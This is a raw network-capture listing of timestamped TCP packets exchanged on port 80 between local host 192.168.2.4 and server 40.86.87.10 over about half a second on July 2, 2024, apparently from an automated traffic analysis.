Jul 2, 2024 07:31:02.668891907 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.668901920 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.668937922 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.668961048 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.669099092 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.669111013 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.669167042 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.669357061 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.669409037 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.669450998 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.669461012 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.669503927 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.669658899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.669675112 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.669684887 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.669696093 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.669718981 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.669730902 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.670051098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.670100927 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.670315027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.670365095 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.670391083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.670402050 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.670452118 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.670639992 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.670650959 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.670660973 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.670675039 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.670687914 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.670706034 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.670734882 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.670979023 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.674716949 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.724973917 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.725038052 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.725045919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.725059986 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.725095987 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.725112915 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.725260973 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.725272894 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.725292921 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.725333929 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.725368977 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.725526094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.725539923 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.725589991 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.725600958 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.789225101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.789300919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.789310932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.789375067 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.789418936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.789463997 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.789542913 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.789587021 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.789612055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.789649963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.789650917 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.789660931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.789715052 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.789724112 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.789911032 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.789954901 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.790016890 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.790026903 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.790038109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.790061951 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.790083885 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.790256023 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.790267944 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.790277004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.790287018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.790307045 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.790334940 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.790632010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.790642023 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.790652990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.790663004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.790687084 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.790699959 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.791057110 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.791065931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.791076899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.791086912 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.791096926 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.791096926 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.791131020 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.791157007 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.791590929 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.791600943 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.791615009 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.791625023 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.791635990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.791647911 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.791652918 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.791697979 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.792217970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.792227030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.792238951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.792248964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.792259932 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.792268038 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.792269945 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.792282104 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.792292118 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.792294979 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.792341948 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.792352915 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.793045044 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.793056011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.793108940 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.793138981 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.793149948 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.793159008 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.793169022 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.793178082 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.793185949 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.793188095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.793198109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.793207884 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.793231010 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.793252945 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.794022083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.794034004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.794042110 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.794053078 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.794063091 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.794073105 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.794080973 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.794085026 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.794101954 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.794114113 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.794142008 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.794698954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.794708967 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.794718027 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.794728041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.794738054 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.794748068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.794754028 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.794758081 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.794768095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.794778109 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.794799089 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.794820070 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.795638084 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.795649052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.795659065 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.795670033 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.795681953 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.795689106 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.795691967 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.795701981 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.795711040 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.795711994 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.795722961 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.795732021 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.795757055 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.795766115 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.815542936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.815623999 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.815634966 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.815712929 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.815778017 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.815836906 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.815857887 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.815870047 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.815881014 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.815891981 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.815928936 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.815949917 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.912062883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.912086010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.912096977 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.912153959 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.912451029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.912461996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.912472010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.912488937 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.912503958 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.912513971 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.912558079 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.912565947 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.912729979 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.912739038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.912749052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.912760019 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.912770033 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.912782907 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.912805080 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.913192987 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.913203955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.913213968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.913224936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.913235903 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.913245916 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.913261890 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.913284063 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.913639069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.913649082 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.913659096 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.913669109 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.913678885 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.913688898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.913692951 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.913701057 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.913708925 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.913708925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.913727999 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.913749933 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.914277077 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.914287090 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.914295912 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.914305925 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.914315939 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.914324999 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.914330959 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.914334059 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.914344072 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.914344072 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.914355040 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.914366961 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.914390087 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.914402008 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.915067911 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.915079117 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.915087938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.915097952 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.915108919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.915117979 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.915123940 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.915129900 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.915139914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.915142059 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.915160894 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.915182114 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.915782928 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.915792942 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.915802002 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.915812969 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.915822983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.915832996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.915837049 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.915843010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.915853024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.915857077 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.915863037 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.915872097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.915875912 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.915883064 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.915899038 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.915911913 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.915935040 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.916589975 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.917301893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.917311907 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.917321920 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.917368889 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.917378902 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.917418957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.917469025 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.917488098 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.917499065 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.917510033 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.917542934 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.917553902 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.917737961 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.917747974 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.917757034 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.917766094 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.917807102 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.917807102 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.917807102 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.917979956 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.917990923 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.917999983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.918009996 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.918035984 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.918054104 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.918215990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.918226004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.918235064 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.918251038 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.918262005 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.918272018 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.918272018 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.918278933 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.918282032 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.918334961 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.918766975 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.918776989 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.918787003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.918797016 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.918807983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.918816090 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.918818951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.918828964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.918838024 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.918858051 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.918868065 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:02.919176102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.919187069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:02.919225931 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.035495043 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.035522938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.035532951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.035598040 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.035664082 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.035686970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.035696983 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.035736084 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.035757065 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.035831928 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.035842896 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.035852909 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.035875082 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.035898924 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.036119938 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.036129951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.036140919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.036151886 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.036171913 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.036199093 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.036370039 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.036381006 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.036390066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.036403894 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.036413908 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:03.036431074 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.036464930 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:03.036840916 CEST	80	49730	40.86.87.10	192.168.2.4
